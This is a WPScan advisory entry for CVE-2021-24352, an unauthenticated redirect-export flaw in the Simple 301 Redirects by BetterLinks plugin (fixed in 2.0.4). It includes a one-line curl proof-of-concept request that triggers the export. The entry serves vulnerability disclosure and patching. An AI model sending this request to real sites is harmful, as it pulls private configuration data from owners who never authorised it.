WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Unauthenticated Redirect Export

Description

The export_data function of the plugin had no capability or nonce checks making it possible for unauthenticated users to export a site's redirects.

Proof of Concept

curl -X POST --url "[URL]/wp-admin/admin-post.php?page=301options&export=true"

Affects Plugins

simple-301-redirects
Fixed in version 2.0.4

References

CVE
CVE-2021-24352
URL
https://www.wordfence.com/blog/2021/05/severe-vulnerabilities-patched-in-simple-301-redirects-by-betterlinks-plugin/

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified

Yes

WPVDB ID
d770f1fa-7652-465a-833c-b7178146847d

Timeline

Publicly Published

2021-05-26 (about 1 years ago)

Added

2021-05-26 (about 1 years ago)

Last Updated

2021-05-27 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin